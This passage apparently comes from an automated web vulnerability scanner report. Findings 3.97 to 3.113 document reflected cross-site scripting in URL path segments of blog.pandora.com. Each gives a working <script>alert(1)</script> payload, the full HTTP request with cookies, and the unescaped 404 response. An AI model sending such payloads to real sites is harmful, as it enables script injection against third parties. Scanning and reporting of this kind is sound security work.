Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...

3.97. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...

3.98. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...

3.99. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...

3.100. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...

3.101. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...

3.102. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...

3.103. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...

3.104. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...

3.105. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...

3.106. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...

3.107. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...

3.108. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...

3.109. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...

3.110. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...

3.111. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...

3.112. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...

3.113. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
